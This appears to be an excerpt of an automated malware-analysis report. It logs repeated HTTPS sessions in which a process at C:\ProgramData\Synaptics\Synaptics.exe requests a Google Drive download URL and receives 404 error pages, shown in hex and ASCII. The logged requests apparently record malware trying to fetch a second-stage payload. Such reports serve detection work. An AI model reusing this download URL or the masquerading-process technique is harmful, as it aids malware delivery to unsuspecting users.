                                                                                                                                                                                        2022-05-17 11:31:52 UTC516INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:52 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-gvq+zAin3eq4Zvkh7Igs3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:52 UTC518INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 45 58 68 4b 31 47 72 7a 37 70 56 6b 62 32 6c 35 56 74 79 77 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gEXhK1Grz7pVkb2l5VtywQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:52 UTC519INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:52 UTC519INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        17192.168.2.349752142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:31 UTC50OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:31 UTC53INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:31 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-VqVD05ZasRXiN2LS7euYMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:31 UTC54INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 6e 34 42 76 6c 36 66 50 79 6a 62 44 42 41 75 74 56 31 32 39 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="nn4Bvl6fPyjbDBAutV129w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:31 UTC56INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:31 UTC56INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        170192.168.2.349940142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:52 UTC516OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:52 UTC520INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:52 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-qJjUKXLdo6aIRqQqRH8X+w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:52 UTC521INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:52 UTC521INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 6d 78 45 34 45 33 59 77 71 4c 54 54 67 65 61 49 7a 74 30 49 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0mxE4E3YwqLTTgeaIzt0Ig">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:52 UTC522INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:52 UTC522INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        171192.168.2.349941142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:52 UTC519OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:52 UTC523INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:52 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-EGe6pA1Wqe5N9kAo+U9ZVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:52 UTC524INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2f 58 4d 33 2b 2b 6b 75 4c 42 47 42 58 54 6a 39 75 64 36 71 39 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="/XM3++kuLBGBXTj9ud6q9w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:52 UTC525INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:52 UTC526INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        172192.168.2.349942142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:52 UTC522OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:53 UTC526INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:53 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-gZM8tRZRKrnFNKfPTLNlVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:53 UTC527INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 68 50 7a 49 70 45 68 6b 68 72 64 34 72 7a 6e 64 34 54 31 51 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VhPzIpEhkhrd4rznd4T1Qw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:53 UTC529INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:53 UTC529INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        173192.168.2.349943142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:53 UTC526OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:53 UTC529INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:53 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-KnLOB/QgUqiTrprlAjUWRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
